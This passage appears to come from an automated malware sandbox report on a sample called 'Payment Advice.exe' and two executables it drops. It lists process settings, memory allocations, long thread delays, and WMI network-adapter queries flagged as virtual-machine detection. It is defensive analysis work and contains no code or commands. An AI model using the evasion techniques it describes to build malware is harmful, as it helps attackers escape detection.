                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 6700, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7952, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7492, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 8EE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 78F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 9EE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: AEE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: B4F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: C4F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: D4F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: F80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: 3070000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: 30E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: 50E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: 8ED0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: 7870000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: 9ED0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: AED0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: B430000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: C430000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: D430000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: F50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: 2890000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeMemory allocated: 4890000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 820000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2440000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2390000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 8180000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 6BA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 9180000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: A180000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: A780000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: B780000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: C780000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1190000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2D80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1310000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1170000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2C70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2AA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 88C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 7360000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 98C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: A8C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: AEB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 88C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1130000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2D50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2B80000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199958
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199828
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199719
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4187Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5963Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 845Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeWindow / User API: threadDelayed 5328Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeWindow / User API: threadDelayed 4516Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWindow / User API: threadDelayed 2012
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWindow / User API: threadDelayed 7837
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 6232
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 3615
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 3599
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 6220
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 6772Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -99766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -99653s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -99530s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -99422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -99312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -99201s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -99049s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -98922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -98812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -98703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -98594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -98484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -98375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -98266s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -98156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -98044s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -97937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -97828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -97714s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -97559s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -97453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -97332s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -97203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -97093s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -96984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -96874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -96766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -96641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -96531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -96421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -96312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -96203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -96094s >= -30000sJump to behavior
